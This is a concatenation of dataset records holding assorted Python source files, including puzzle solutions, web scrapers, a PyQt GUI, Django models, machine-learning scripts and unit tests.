try:\n os.makedirs('certs_flat')\n except OSError as error:\n if error.errno != errno.EEXIST:\n raise\n\n # Load existing file if present\n acme_file_path = os.path.join(path, \"acme.json\")\n if os.path.isfile(acme_file_path):\n logging.info(\"Loading initial file {}\".format(acme_file_path))\n extract_certificates_from_acme(acme_file_path)\n\n # Create event handler and observer\n event_handler = AcmeFileHandler()\n observer = Observer()\n\n # Register the directory to watch\n observer.schedule(event_handler, path)\n\n # Main loop to watch the directory\n observer.start()\n logging.info(\"Watching {} for certificate updates\".format(path))\n try:\n while True:\n time.sleep(1)\n except KeyboardInterrupt:\n observer.stop()\n observer.join()\n","sub_path":"extractor.py","file_name":"extractor.py","file_ext":"py","file_size_in_byte":4620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"624365155","text":"#!/usr/bin/python3\n\nimport copy\n\ntest_code = \"\"\"nop +0\nacc +1\njmp +4\nacc +3\njmp -3\nacc -99\nacc +1\njmp -4\nacc +6\"\"\".split('\\n')\n\ndef load(code):\n program = []\n\n for line in code:\n instr,arg = line.split(' ')\n program.append([instr,int(arg)])\n\n return program\n\ndef run(program):\n acc = 0\n i = 0\n loop = set() \n \n while(1):\n if i in loop:\n break\n loop.add(i)\n\n (instr,arg) = program[i]\n\n if instr == 'nop':\n i = i + 1\n elif instr == 'acc':\n acc = acc + arg\n i = i + 1\n elif instr == 'jmp':\n i = i + arg \n return acc \n \ndef run(program):\n acc = 0\n i = 0\n loop = set() \n \n while(1):\n if i in loop:\n exitval = 'LOOP'\n break\n elif i == len(program):\n exitval = 'TERM'\n break\n else:\n loop.add(i)\n\n (instr,arg) = program[i]\n\n if instr == 'nop':\n i = i + 1\n elif instr == 'acc':\n acc = acc + arg\n i = i + 1\n elif instr == 'jmp':\n i = i + arg \n return (acc,exitval)\n\ntprogram = load(test_code)\nacc, exitval = run(tprogram)\n\nassert acc == 5\n\nf = open('input8.txt')\n\ncode = [ line[:-1] for line in f ]\nprogram = load(code)\nacc,_ = run(program)\n\nassert acc == 1521\nprint('Part One', acc)\n\ntprogram2 = tprogram.copy() \ntprogram2[-2][0] = 'nop'\n\nacc,exitval = run(tprogram2)\n\nassert exitval == 'TERM'\n\ndef fix_program(program):\n for i in range(len(program)):\n mprogram = copy.deepcopy(program)\n if mprogram[i][0] == 'acc':\n continue\n else:\n if mprogram[i][0] == 'nop':\n mprogram[i][0] = 'jmp'\n else:\n mprogram[i][0] = 'nop'\n acc,exitval = run(mprogram)\n if exitval == 'TERM':\n return (acc,mprogram)\n\nacc,_ = fix_program(program)\nprint('Part Two:',acc)\n \n \n\n","sub_path":"20/day8.py","file_name":"day8.py","file_ext":"py","file_size_in_byte":2026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"494540145","text":"import requests\nimport bs4\nimport re\nimport time\nimport json\n\n\n\ndef main_page():\n req = requests.get(\"https://www.chicagotribune.com/\")\n soup = bs4.BeautifulSoup(req.text,'html.parser')\n div = soup.findAll('div', attrs={'class': 'flex-grid'})\n refs = []\n ref_dict = {}\n for d in div:\n refs += re.findall(r'

(.*?)

', str(div))\n for ref in refs:\n key = re.sub(r'<.*?>', '', ref)\n val = re.findall(r'href=\"(.*?)\"', ref)[0]\n ref_dict[key] = val\n return ref_dict\n\n\ndef content_news(news_link: str):\n #req = requests.get(news_link)\n news_link=\"https://www.chicagotribune.com/\"\n req = requests.get(news_link)\n soup = bs4.BeautifulSoup(req.text,'html.parser')\n content_dict = {}\n\n if re.search('www.chicagotribune.com', news_link):\n cont = soup.findAll('main', attrs={'class': 'artcl--m'})\n aucont = soup.findAll('div', attrs={'class': 'byline-wrapper'})\n else:\n return {}\n\n paragraphs = []\n authors = []\n for div in cont:\n paragraphs += re.findall(r'(.*?)

', str(div))\n for div in aucont:\n authors += re.findall(r'(.*?)', str(div))\n if len(paragraphs):\n content_dict['content'] = ' '.join(paragraphs)\n if len(authors):\n content_dict['authors'] = ' '.join(authors)\n return content_dict\n\n\ndef validate(entry: dict):\n keywords = ['republican', 'Republican', 'GOP', 'democratic', 'Democratic']\n title = entry.get('title')\n content = entry.get('content')\n if title == None or content == None:\n return False\n fit = False\n for keyword in keywords:\n if re.search(keyword, title):\n fit = True\n if re.search(keyword, content):\n fit = True\n return fit\n\n\ndef save_json (data, fname: str):\n with open(fname, 'w') as fp:\n json.dump(data, fp)\n\n\ndef load_json(fname: str):\n d = {}\n try:\n with open(fname, 'r') as fp:\n d = json.load(fp)\n finally:\n return d\n\n\nif __name__ == '__main__':\n entries = load_json(\"chicagotribune.json\")\n filtered_entries = load_json(\"chicagotribune_filtered.json\")\n i = 1\n\n while 1:\n print(\"Попытка #\" + str(i))\n refs = main_page()\n for entry_name, link in refs.items():\n if entries.get(link) == None:\n time.sleep(.5)\n print('Получение контента: \"' + entry_name + '\"...')\n news = content_news(link)\n if len(news):\n news['title'] = entry_name\n entries[link] = news\n if validate(news):\n filtered_entries[link] = news\n else:\n entries[link] = {}\n save_json(entries, \"chicagotribune.json\")\n save_json(filtered_entries, \"chicagotribune_filtered.json\")\n print(\"Попытка #\" + str(i) + \" закончена\\n\")\n i += 1\n time.sleep(3600)","sub_path":"Chicagotribune_news.py","file_name":"Chicagotribune_news.py","file_ext":"py","file_size_in_byte":3034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"539847539","text":"def main():\n print(\"ENTRE DOS VALORES\")\n primero=int(input(\"Escriba un numero: \"))\n segundo=int(input(f\"Escriba un numero mayor que {primero}: \"))\n contador=0\n\n while segundo<=primero:\n segundo=int(input(f\"{segundo} no es mayor que {primero}. Intentelo de nuevo: \"))\n while segundo>primero:\n numero=int(input(f\"Escriba un numero entre {primero} y {segundo}: \"))\n\n if numero>=primero and numero<=segundo:\n contador=contador+1\n\n else:\n print(f\"Ha escrito {contador} numeros entre {primero} y {segundo}.\")\n segundo=primero+segundo\n\n\n\n\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"bucle while 1/7.py","file_name":"7.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"612478006","text":"def digits_sum(num):\n\tsum = 0\n\twhile(num > 0):\n\t\trem = num % 10\n\t\tsum += rem\n\t\tnum = num // 10\n\treturn sum\n\ndef compute_join_points(s1, s2):\n\tsum1 = 0\n\tsum2 = 1\n\twhile(s1 != s2):\n\t\tsum1 = s1 + digits_sum(s1)\n\t\tsum2 = s2 + digits_sum(s2)\n\t\ts1 = sum1\n\t\ts2 = sum2\n\t\tif(s1 == s2):\n\t\t\treturn s1\n \n\t\t\t\nprint(compute_join_points(471, 480))\n\n","sub_path":"bootcamp_problems/sum_joint.py","file_name":"sum_joint.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"95958367","text":"\n# coding: utf-8\n\n# # [LEET] Maxincreaseskyline\n# \n\n# In[ ]:\n\n\n\na = [[3, 0, 8, 4], [2, 4, 5, 7], [9, 2, 6, 3], [0, 3, 1, 0]]\ndef maxincreaseskyline(grid):\n total = 0 \n grid_vert = list(zip(*grid))\n lr_skyline = []\n ud_skyline = []\n for row in grid:\n lr_skyline.append(max(row))\n for column in grid_vert:\n ud_skyline.append(max(column))\n for row in grid:\n row_ind = grid.index(row)\n for index in range(len(row)):\n \n total += min(lr_skyline[row_ind],ud_skyline[index]) - row[index]\n\n return total\nmaxincreaseskyline(a)\n\n","sub_path":"Max Increase Skyline.py","file_name":"Max Increase Skyline.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"321527184","text":"from PyQt5.QtWidgets import *\nfrom PyQt5 import *\nimport sys\nimport osn.osnov as osn\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtCore import *\nimport docx as doc\nimport numpy as np\nimport pandas as pds\n# end of importing\n\n\nclass App(QWidget):\n def __init__(self):\n super().__init__()\n self.title = 'Генератор тестов'\n self.left = 500\n self.top = 300\n self.width = 800\n self.height = 600\n self.initUI()\n\n def initUI(self):\n self.textbox = QLabel(\"Введите количество тестов\\n(не более 100)\")\n self.textbox2 = QLabel(\"Выберите количество уровней сложности\")\n self.textbox3 = QLabel(\"Выберите количество задач каждого уровня сложности\\n(сумма задач не должна превышать 100)\")\n self.numvar1 = QLabel(\"Введите количество вариантов\\n(не более 40)\")\n\n self.text = QLineEdit(self) # поля для ввода текта\n self.text3 = QLineEdit(self)\n self.numvar2 = QLineEdit(self)\n\n self.text2 = QComboBox(self) # выбор количества сложностей\n self.ls = ['1', '2', '3']\n self.text2.addItems(self.ls)\n\n self.butt = QPushButton(\"ok\")\n self.dir = QPushButton(\"Выберите путь для создания теста\")\n self.new = QPushButton(\"Добавьте новый тип задания\")\n\n hbox = QGridLayout()\n hbox.setVerticalSpacing(0.5)\n hbox.addWidget(self.textbox,0,0,2,1)\n hbox.addWidget(self.text,0,1,2,3)\n hbox.addWidget(self.numvar1,1,0,2,1)\n hbox.addWidget(self.numvar2,1,1,2,3)\n hbox.addWidget(self.textbox2, 2, 0,2,1)\n hbox.addWidget(self.text2, 2, 1,2,3)\n hbox.addWidget(self.textbox3, 3, 0,2,1)\n hbox.addWidget(self.text3, 3, 1,2,3)\n hbox.addWidget(self.new, 4,0,3,5)\n hbox.addWidget(self.dir, 5,0,3,5)\n hbox.addWidget(self.butt, 6, 0,3,5)\n\n self.new.clicked.connect(self.creating) # обработка нажатия кнопок\n self.dir.clicked.connect(self.pick_new)\n self.butt.clicked.connect(self.on_click)\n self.setLayout(hbox)\n\n self.setWindowTitle(self.title)\n self.setGeometry(self.left, self.top, self.width, self.height)\n self.show()\n\n @pyqtSlot()\n def pick_new(self):\n self.dialog = QFileDialog()\n self.folder_path = self.dialog.getExistingDirectory(None, \"Select Folder\")\n\n\n @pyqtSlot()\n def on_click(self):\n self.ammtests = self.text.text()\n self.each = self.text3.text()\n self.stro = str(self.text2.currentText())\n self.w1 = QLabel(\"Тест готов\")\n self.w1.move(800, 500)\n self.w1.resize(100, 200)\n self.w1.show()\n\n @pyqtSlot()\n def creating(self):\n pass\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n ex = App()\n sys.exit(app.exec_())\n\n","sub_path":"osn/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"505737221","text":"\"\"\"creates various optimizers\"\"\"\nimport torch.optim as optim\nfrom torch.optim.lr_scheduler import LambdaLR\n\n\nclass OptimizerFactory():\n \"\"\"OptimizerFactory contains wrappers to create various optimizers.\"\"\"\n @staticmethod\n def create(args, tagger, special_bert = False): \n if args.opt == 'sgd':\n optimizer = optim.SGD(list(tagger.parameters()), lr=args.lr, momentum=args.momentum)\n elif args.opt == 'adam':\n optimizer = optim.Adam(list(tagger.parameters()), lr=args.lr, betas=(0.9, 0.999))\n else:\n raise ValueError('Unknown optimizer, must be one of \"sgd\"/\"adam\".')\n \n if (special_bert):\n bert_parameters = list(tagger.word_seq_indexer.emb.parameters())\n not_bert_parameters = list(list(tagger.birnn_layer.parameters()) + list(tagger.lin_layer.parameters()) + list(tagger.log_softmax_layer.parameters()))\n optimizer = optim.Adam([{'params':not_bert_parameters, 'lr':args.lr, 'betas':(0.9, 0.999)}, {'params':bert_parameters, 'lr':args.lr_bert, 'betas':(0.9, 0.999)}])\n\n scheduler = LambdaLR(optimizer, lr_lambda=lambda epoch: 1 / (1 + args.lr_decay * epoch))\n #bert_scheduler = LambdaLR(bert_optimizer, lr_lambda=lambda epoch: 1 / (1 + args.lr_decay * epoch))\n return optimizer, scheduler\n","sub_path":"src/factories/factory_optimizer.py","file_name":"factory_optimizer.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"434981735","text":"from __future__ import unicode_literals\nfrom django.db import models\nfrom django.conf import settings\nfrom clients.models import Client\nfrom vehicles.models import Vehicle, Vehicle_version\nimport uuid\n# Create your models here.\n\nclass StockExchange(models.Model):\n\t\n\t##Tipo de mensualidad 60 o 40 mensualidades\n\t######\n\tdescription = models.TextField()\t\n\tmonthly = models.IntegerField()\n\n\tclass Meta:\n\t\tverbose_name = \"StockExchange\"\n\t\tverbose_name_plural = \"StockExchanges\"\n\n\tdef __str__(self):\n\t\treturn str(self.monthly)\n\nclass groups_stockExchange(models.Model):\n\tstockexchange = models.ForeignKey(StockExchange, related_name= 'groups_stockExchange')\n\tunique_id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)\n\tmaximum_number_customers = models.IntegerField()\n\tgroup_description = models.TextField()\n\n\tdef __str__(self):\n\t\treturn str(self.unique_id)\n\n\n\n\n\n\n\n\nclass SettingsFinantial(models.Model):\n\tupdate_factor = models.FloatField()\n\tadministration_fee = models.FloatField()\n\tinscription_fee = models.FloatField()\n\n\tclass Meta:\n\t\tverbose_name = \"SettingsFinantial\"\n\t\tverbose_name_plural = \"SettingsFinantials\"\n\n\t\t# def __str__(self):\n\t\t# \treturn (self.update_factor, self.administration_fee)\n\nclass Payment_methods(models.Model):\n\n\n\tname = models.CharField(max_length=100)\n\n\n\n\tdef __str__(self):\n\n\t\treturn self.name\n\n\n\n\n\n\nclass Agreement(models.Model):\n\n\tunique_id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)\t\n\tBOOL_CHOICES = ((True, 'Activo'), (False, 'Finalizado'))\t\n\tzone = models.CharField(max_length=50, blank=True, null=True)\n\tobservations = models.TextField(blank=True, null=True)\n\tdate = models.DateField(auto_now=True)\n\tstatus = models.BooleanField(default=False)\n\tBOOL_CHOICES2 = ((True, 'Adjudicado'),(False, 'No Adjudicado'))\t\n\tid_client = models.ForeignKey(Client, related_name='agreement')\n\tid_vehicle_version = models.ForeignKey(Vehicle_version, related_name='agreement')\n\tgroups_stockexchange = models.ForeignKey(groups_stockExchange, related_name='agreement')\n\tvehicle_price = models.FloatField(blank=True, null=True)\n\tpayment_deadline = models.DateField(auto_now=True)\n\tadjudication = models.BooleanField(choices=BOOL_CHOICES2, default=False)\n\t##Camos de contrato\t\n\n\tdef __str__(self):\n\n\t\treturn str(self.unique_id)\n\n\nclass DetailPayment (models.Model):\n\t\n\tagreement = models.ForeignKey(Agreement, related_name='detail_payment' )\n\tconcept = models.CharField(max_length=250)\n\tpayment_reference = models.CharField(max_length=400, null= True, blank = True)\n\tamount = models.FloatField()\n\tobservations = models.TextField()\n\tdate_payment = models.DateField()\n\n\n\tclass Meta:\n\t\tverbose_name = \"DetailPayment\"\n\t\tverbose_name_plural = \"DetailPayments\"\n\n\tdef __str__(self):\n\t\treturn self.concept\n\n\n\n\n# class MonthlyPayment(models.Model):\n# \tmonthly = models.CharField(max_length=100)\n# \tid_vehiclebooking = models.ForeignKey(VehicleBooking, related_name='monthlypayment')\n\n# \tclass Meta:\n# \t\tverbose_name = \"MonthlyPayment\"\n# \t\tverbose_name_plural = \"MonthlyPayments\"\n\n# \tdef __str__(self):\n# \t\treturn self.monthly\n","sub_path":"vehicles_finances/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"411384414","text":"import scrapy\nfrom selenium import webdriver\n\nimport re\nimport logging\n\nemail_re = re.compile('[\\w\\d]+@[\\w\\d]+\\.[\\w\\d]+')\nchangeroute_re = re.compile('changeRoute\\(\\'(.*)\\'\\)')\n\nclass EmailScraperSpider(scrapy.Spider):\n\n custom_settings = {'NEWSPIDER_MODULE': 'emailscraper.spiders',\n 'FEED_FORMAT': 'json',\n 'SPIDER_MODULES': ['emailscraper.spiders'],\n 'FEED_URI': 'temp',\n 'BOT_NAME': 'emailscraper',\n 'ROBOTSTXT_OBEY': True }\n\n\n name = 'emailscraper'\n\n browser = webdriver.Chrome()\n\n def __init__(self, website=None, *args, **kwargs):\n super(EmailScraperSpider, self).__init__(*args, **kwargs)\n self.start_urls = ['http://{0}/'.format(website)]\n self.allowed_domains = [website]\n\n def parse(self, response):\n for href in response.xpath('//a/@href'):\n full_url = response.urljoin(href.extract())\n yield scrapy.Request(full_url, callback=self.parse_emails)\n for cr_call in response.xpath('//span/@ng-click'):\n route = changeroute_re.match(cr_call.extract()).group(1)\n full_url = response.urljoin('/' + route)\n yield scrapy.Request(full_url, callback=self.parse_emails)\n\n def parse_emails(self, response):\n self.browser.get(response.url)\n body = self.browser.page_source\n logging.info('Reading response body: ' + body)\n for email in email_re.findall(body):\n logging.info('Found email address: ' + email)\n yield {'email': email}\n\n def closed(self, reason):\n self.browser.close()\n super(EmailScraperSpider, self).close(reason)\n\n","sub_path":"emailscraper/email_scraper_spider.py","file_name":"email_scraper_spider.py","file_ext":"py","file_size_in_byte":1711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"504304299","text":"import os.path\nimport utl.messages as msg\n\n#Extensiones de archivos\nEXT={\n 'SQL':'.sql',\n 'JSON':'.json',\n 'DB':'.db',\n}\n\n\ndef LeerArch(path=\"\",ext=\"\"):\n \"\"\"LeerArch : Lee un archivo linea por linea creando un string master\"\"\"\n if ValidArch(path,ext):\n linemaster=\"\"\n fdata = open(path, 'r')\n for lineaux in fdata:\n linemaster += lineaux\n else:\n return None,msg.ERROR.InputMsggErr(\"ExistArch\")\n\n\ndef ValidArch(path=\"\",ext=\"\"):\n \"\"\"ValidArch : valida la extencion de un archivo e valida si existe\n path:el archivo ubicado\n ext:extension del archivo\"\"\"\n global EXT\n if ExistArch(path):\n try:\n return EXT[ext] in path\n except :\n return False\n else:\n return False\n\n\ndef ExistArch(path=\"\"):\n \"\"\"ExistArch : Verifica si el archivo o carpeta existe.\"\"\"\n if os.path.isdir(path) or os.path.isfile(path):\n return True\n else:\n return False\n\ndef CreateDir(path=\"\"):\n \"\"\"CreateDir : Crea una carpeta.\"\"\"\n if ExistArch(path):\n return None\n else:\n try:\n os.mkdir(path)\n return None\n except:\n return msg.ERROR.MsggErr(\"CreateArch\")","sub_path":"BatchPaty/utl/arch.py","file_name":"arch.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"581600522","text":"import insightconnect_plugin_runtime\nfrom .schema import ConnectionSchema, Input\nfrom insightconnect_plugin_runtime.exceptions import PluginException, ConnectionTestException\n\n# Custom imports below\nfrom icon_checkphish.util.api import CheckPhishAPI\n\n\nclass Connection(insightconnect_plugin_runtime.Connection):\n def __init__(self):\n super(self.__class__, self).__init__(input=ConnectionSchema())\n self.api = None\n\n def connect(self, params):\n self.logger.info(\"Connect: Connecting...\")\n self.api = CheckPhishAPI(\n api_key=params.get(Input.API_KEY).get(\"secretKey\"),\n logger=self.logger,\n )\n\n def test(self):\n try:\n self.api.test_api()\n except PluginException:\n raise ConnectionTestException(\n cause=\"Connection Test Failed.\", assistance=\"Please check that your API key is correct.\"\n )\n\n return {}\n","sub_path":"plugins/checkphish/icon_checkphish/connection/connection.py","file_name":"connection.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"97337015","text":"# Considerar la funcion f tal que f(x) = 1/x.\n# Utilizando el ejercicio anterior, graficar en una misma figura f y\n# p que interpole {(i, f(i))} i=1..5, usando para ambas los puntos equiespaciados\n# zj = 24/25 + j/25, j = 1, . . . , 101\n\nfrom ej2_inewton import inewton\nfrom ej1_ilagrange import ilagrange\nimport matplotlib.pyplot as plt\n\nf = lambda x: 1 / x\n\n# {(i, f(i))} i=1..5\nlista_i = list(range(1, 6))\nlista_f = [f(i) for i in lista_i]\n\n# zj = 24/25 + j/25, j = 1, . . . , 101\nlista_z = [24 / 25 + j / 25 for j in range(1, 102)]\nf_plot = [f(z) for z in lista_z]\n\n# p_plot = ilagrange(lista_i, lista_f, lista_z)\np_plot = inewton(lista_i, lista_f, lista_z)\n\nplt.plot(lista_z, f_plot, label=\"funcion f\")\nplt.plot(lista_z, p_plot, label=\"polinomio interpolante\")\nplt.grid()\nplt.legend()\n\nplt.show()","sub_path":"codigos/lab3/ej3.py","file_name":"ej3.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"355708544","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun May 30 14:14:28 2021\n\n@author: JIL\n\n\"\"\"\n\n'''载入数据'''\nfrom sklearn import datasets\n\nboston = datasets.load_boston()\nx, y = boston.data, boston.target\n'''引入标准化函数'''\nfrom sklearn import preprocessing\n\nx_MinMax = preprocessing.MinMaxScaler()\ny_MinMax = preprocessing.MinMaxScaler()\n\n''' 将 y 转换成 列 '''\nimport numpy as np\n\ny = np.array(y).reshape(len(y), 1)\n'''标准化'''\nx = x_MinMax.fit_transform(x)\ny = y_MinMax.fit_transform(y)\n\n''' 按二八原则划分训练集和测试集 '''\nfrom sklearn.model_selection import train_test_split\n\nnp.random.seed(2019)\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.2)\n\n'''模型构建'''\nfrom sklearn.neural_network import MLPRegressor\n\nfit1 = MLPRegressor(hidden_layer_sizes=(100, 50), activation='relu', solver='adam', alpha=0.01, max_iter=200)\n# 第一个隐藏层有100个节点,第二层有50个,激活函数用relu,梯度下降方法用adam\n# 惩罚系数为0.01,最大迭代次数为200\nprint (\"fitting model right now\")\nfit1.fit(x_train, y_train)\npred1_train = fit1.predict(x_train)\n'''计算训练集 MSE'''\nfrom sklearn.metrics import mean_squared_error\n\nmse_1 = mean_squared_error(pred1_train, y_train)\nprint (\"Train ERROR = \", mse_1)\n'''计算测试集mse'''\npred1_test = fit1.predict(x_test)\nmse_2 = mean_squared_error(pred1_test, y_test)\nprint (\"Test ERROR = \", mse_2)\n\n'''结果可视化'''\nimport matplotlib.pyplot as plt\n\nxx = range(0, len(y_test))\nplt.figure(figsize=(8, 6))\n#反归一化\n\n#pred1_test = y_MinMax.inverse_transform(pred1_test)\ny_test = y_MinMax.inverse_transform(y_test)\npred1_test = np.array(pred1_test).reshape(len(pred1_test),1)\npred1_test = y_MinMax.inverse_transform(pred1_test)\n\nplt.plot(xx, pred1_test, 'ko-', label=\"Predict\")\nplt.plot(xx, y_test, 'ro-', label=\"Real\")\n\n# plt.scatter(xx, y_test, color=\"red\", label=\"Sample Point\", linewidth=3)\n# plt.plot(xx, pred1_test, color=\"orange\", label=\"Fitting Line\", linewidth=2)\nplt.legend()\nplt.show()\n#分析结果\n\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.metrics import mean_absolute_error\nfrom sklearn.metrics import r2_score\ny_t = []\ny_h = []\nfor i in y_test:\n y_t.append(i)\nfor i in pred1_test:\n y_h.append(i)\nprint(\"MSE:\", mean_squared_error(y_t, y_h))\nprint(\"MAS:\", mean_absolute_error(y_t, y_h))\nprint(\"R2:\", r2_score(y_t, y_h))\n","sub_path":"NNRa.py","file_name":"NNRa.py","file_ext":"py","file_size_in_byte":2391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"44788214","text":"import sys\n\ndef hex2binary(hex_code: str) -> str:\n return ''.join([bin(int(elem, 16))[2:].rjust(4, \"0\") for elem in hex_code])\n\ndef parse(code):\n version, code = int(code[:3], 2), code[3:]\n package_type, code = int(code[:3], 2), code[3:]\n if package_type == 4:\n # literal value\n value = 0\n while True:\n section, code = code[:5], code[5:]\n value <<= 4\n value += int(section[1:], 2)\n if section[0] == \"0\":\n break\n return value, code\n else:\n # operator\n length_bit, code = code[0], code[1:]\n length_bit = 11 if length_bit == \"1\" else 15\n package_count, code = int(code[:length_bit], 2), code[length_bit:]\n sub_values = []\n for _ in range(package_count):\n if not code.strip('0'):\n print(\"Invalid package length\")\n break\n sub_value, code = parse(code)\n # check if invalid package\n if sub_values is not None:\n sub_values.append(sub_value)\n if package_type == 0:\n return sum(sub_values), code\n if package_type == 1:\n value = 1\n for sub_value in sub_values:\n value *= sub_value\n return value, code\n if package_type == 2:\n return min(sub_values), code\n if package_type == 3:\n return max(sub_values), code\n if package_type == 5:\n assert len(sub_values) == 0, \"Invalid sub-package count\"\n return sub_values[0] > sub_values[1], code\n if package_type == 6:\n assert len(sub_values) == 0, \"Invalid sub-package count\"\n return sub_values[0] < sub_values[1], code\n if package_type == 7:\n assert len(sub_values) == 0, \"Invalid sub-package count\"\n return sub_values[0] == sub_values[1], code\n raise Exception(\"The given code is not binary!\")\n\ndata = open(sys.argv[1], 'r').read().split('\\n')[:-1]\nfor entry in data:\n code = hex2binary(entry)\n version, _ = parse(code)\n print(int(version))\n \n \n \n","sub_path":"2021/16/task2.py","file_name":"task2.py","file_ext":"py","file_size_in_byte":2141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"273819455","text":"import copy\nimport pytest\n\nfrom spark.config.config_set import UniversalConfigSet\nfrom spark.model.gaussian_model import GaussianModel\nfrom spark.model.training_data import TrainingData\n\n\n@pytest.fixture(scope=\"class\", autouse=True)\ndef gaussian_model():\n training_data = TrainingData()\n config_set = UniversalConfigSet(10, 1024 * 10)\n yield GaussianModel(training_data, config_set)\n\n\nclass TestGaussianModel:\n\n def test_gaussian_model_no_data(self, gaussian_model):\n model = copy.deepcopy(gaussian_model)\n with pytest.raises(Exception, match=\"No training data found\"):\n assert model.train()\n\n def test_gaussian_model_invalid_training_data(self, gaussian_model):\n model = copy.deepcopy(gaussian_model)\n training_sample = {\n \"spark.sql.shuffle.partitions\": 100,\n \"spark.executor.memory\": 1024 * 5,\n \"spark.driver.memory\": 1024,\n \"invalid_config\": 123\n }\n with pytest.raises(Exception, match=\"Invalid config to be added as training data. \"\n \"Missing config: spark.executor.cores, Extra config: invalid_config\"):\n assert model.add_sample_to_train_data(training_sample, 12)\n\n def test_gaussian_model_training(self, gaussian_model):\n model = copy.deepcopy(gaussian_model)\n training_sample = {\n \"spark.executor.memory\": 1024 * 5,\n \"spark.sql.shuffle.partitions\": 100,\n \"spark.executor.cores\": 4,\n \"spark.driver.memory\": 512\n }\n model.add_sample_to_train_data(training_sample, 12)\n model.add_sample_to_train_data(training_sample, 12)\n # Ensure the order in training data is same as the one in config_set\n assert model.training_data.get_training_data()[0][\"configs\"].get_all_param_names() == \\\n [\"spark.sql.shuffle.partitions\", \"spark.executor.memory\", \"spark.driver.memory\", \"spark.executor.cores\"]\n\n assert model.training_data.get_training_data()[0][\"configs\"].get_all_param_values() == \\\n [100, 1024 * 5, 512, 4]\n\n model.train()\n\n # Ensure that normalised values are between 0 and 1\n for normalized_config_value in model.training_inp_normalized[0]:\n assert 0 <= normalized_config_value <= 1\n\n # Ensure order is maintained\n assert model.training_inp_normalized[0] == model.training_inp_normalized[1]\n","sub_path":"spark/pytest/model/test_gaussian_model.py","file_name":"test_gaussian_model.py","file_ext":"py","file_size_in_byte":2437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"643189514","text":"class Node:\n left = None\n right = None\n\n def __init__(self, key, val):\n self.key = key\n self.val = val\n\n\ndef insert(node, key, val):\n if node is None:\n return Node(key, val)\n if node.key == key:\n node.val = val\n elif node.key < key:\n node.left = insert(node.left, key, val)\n else:\n node.right = insert(node.right, key, val)\n return node\n\n\ndef search(node, key):\n if node is None:\n raise KeyError\n if node.key == key:\n return node.val\n elif node.key < key:\n return search(node.left, key)\n else:\n return search(node.right, key)\n\n\nclass BSTree:\n '''\n >>> tree = BSTree()\n\n >>> tree['a'] = 10\n\n >>> tree['b'] = 20\n\n >>> tree['b']\n 20\n\n >>> 'b' in tree\n True\n\n >>> 'c' in tree\n False\n '''\n root = None\n\n def __setitem__(self, key, val):\n self.root = insert(self.root, key, val)\n\n def __getitem__(self, key):\n return search(self.root, key)\n\n def __contains__(self, key):\n try:\n search(self.root, key)\n except KeyError:\n return False\n return True\n\n\ndef partition(seq):\n pi, seq = seq[0], seq[1:]\n lo = [x for x in seq if x < pi]\n high = [x for x in seq if x > pi]\n return lo, pi, high\n\n\ndef select(seq, k):\n lo, pi, high = partition(seq)\n m = len(lo)\n if m == k:\n return pi\n elif m > k:\n return select(lo, k)\n else:\n return select(high, k - m - 1)\n\n\ndef quick_sort(seq):\n if len(seq) <= 1:\n return seq\n lo, pi, high = partition(seq)\n return quick_sort(lo) + [pi] + quick_sort(seq)\n\n\ndef merge_sort(seq):\n mid = len(seq) / 2\n lft, rgt = seq[:mid], seq[mid:]\n if len(lft) > 1:\n lft = merge_sort(lft)\n if len(rgt):\n rgt = merge_sort(rgt)\n res = []\n while lft and rgt:\n if lft[-1] > rgt[-1]:\n res.append(lft.pop())\n else:\n res.append(rgt.pop())\n res.reverse()\n return (lft or rgt) + res\n\n\nif __name__ == '__main__':\n import doctest\n doctest.testmod()\n","sub_path":"divide_and_conquer.py","file_name":"divide_and_conquer.py","file_ext":"py","file_size_in_byte":2092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"58200284","text":"import numpy as np\nimport gym\nimport mujoco_py\nimport matplotlib.pyplot as plt\nfrom gym.spaces import Discrete, Box\nimport argparse\nfrom actor import Actor\n\ndef evaluate_policy(env, policy, test_episode=100, max_step=500, render=False, plot=False):\n reward_list = []\n\n for i_episode in 